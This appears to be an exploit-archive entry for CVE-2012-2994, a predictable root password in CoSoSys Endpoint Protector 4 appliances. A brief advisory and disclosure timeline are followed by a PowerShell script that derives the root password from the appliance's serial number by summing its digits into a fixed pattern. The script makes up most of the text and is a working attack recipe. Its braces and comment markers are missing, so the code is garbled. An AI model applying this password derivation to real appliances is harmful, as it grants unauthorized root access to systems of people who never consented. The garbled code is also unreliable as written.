CoSoSys Endpoint Protector - Predictable Password Generation

Related Vulnerabilities: CVE-2012-2994  
Publish Date: 17 Sep 2012

CoSoSys Endpoint Protector is prone to an insecure password generation vulnerability.

Successfully exploiting this issue may allow an attacker to guess generated passwords and gain access to affected appliances.

CoSoSys Endpoint Protector 4 is vulnerable; other versions may also be affected. 

function Get-EPPPassword {

 Get-EPPPassword calculates the predictable root password for Cososys Endpoint Protector 4 servers.
 Author: Chris Campbell (@obscuresec)
 License: BSD 3-Clause

 Get-EPPPassword Timeline: 
  discovered            3 Mar 2012
  reported to vendor   12 Jun 2012
  reported to US-CERT  15 Jul 2012
  released             17 Sep 2012

 Get-EPPPassword -Serial 123456789


Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Serial)

#function to calculate sums from serial number 
function GetSerialSum {
 if ($Serial.Length -ne 9) {
        Return "EPP Serial Number is 9 digits"
    else {
 #convert $serial to an array of integers 
  [int[]] $SerialArray = [char[]]$Serial| ForEach-Object {[int]"$_"}
 foreach ($Number in $SerialArray) {
            $Sum += $Number
 Write-Output $Sum

#function to calculate epproot password
function GetPassword {
 Write-Output "eroot!00$Sums`RO"
$Sums = GetSerialSum

Get-EPPPassword -Serial 135792468